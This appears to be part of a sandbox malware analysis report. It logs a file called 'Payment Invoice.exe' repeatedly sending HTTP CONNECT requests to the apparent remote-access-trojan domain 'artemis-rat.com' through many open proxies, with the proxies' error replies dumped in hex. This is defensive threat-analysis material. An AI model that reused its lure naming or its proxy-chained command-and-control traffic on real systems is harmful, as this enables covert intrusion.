                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                931192.168.2.45276798.162.25.7316537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.457084894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                932192.168.2.45276974.48.7.43807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.458383083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                933192.168.2.45271634.64.4.27807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.458650112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.858535051 CET1286INHTTP/1.1 405 Method Not Allowed
                                                                Content-Type: text/html; charset=UTF-8
                                                                Referrer-Policy: no-referrer
                                                                Content-Length: 1592
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20
                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 405 (Method Not Allowed)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen
                                                                Mar 11, 2024 16:15:18.858988047 CET489INData Raw: 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65
                                                                Data Ascii: and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </styl


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                934192.168.2.452691121.66.198.7641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.459358931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                935192.168.2.452824104.21.124.121807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.469644070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.623712063 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                936192.168.2.45278445.60.186.208274887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.471379042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                937192.168.2.45272551.89.173.40515117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.475111961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214387894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.214787960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.214817047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.027050972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                938192.168.2.45278323.19.244.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.486668110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                939192.168.2.45274923.137.248.19788887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.491421938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.785262108 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                940192.168.2.452844172.67.182.102807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.494633913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.648932934 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                941192.168.2.452849104.20.125.124807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.497323990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.651671886 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                942192.168.2.452846162.159.241.160807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.499721050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.661012888 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                943192.168.2.452737170.64.206.11480007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.514143944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                944192.168.2.451894117.160.250.13488997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.514385939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.589324951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.309123993 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                945192.168.2.45235992.204.134.38529297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.515144110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                946192.168.2.452662116.199.168.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.515536070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                947192.168.2.45276843.163.192.3156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.515542030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                948192.168.2.45275134.95.243.12280817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.515631914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214443922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.214807987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                949192.168.2.45252864.227.108.25319087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.515796900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                950192.168.2.45268915.207.35.24110807076C:\Users\user\Desktop\Payment Invoice.exe
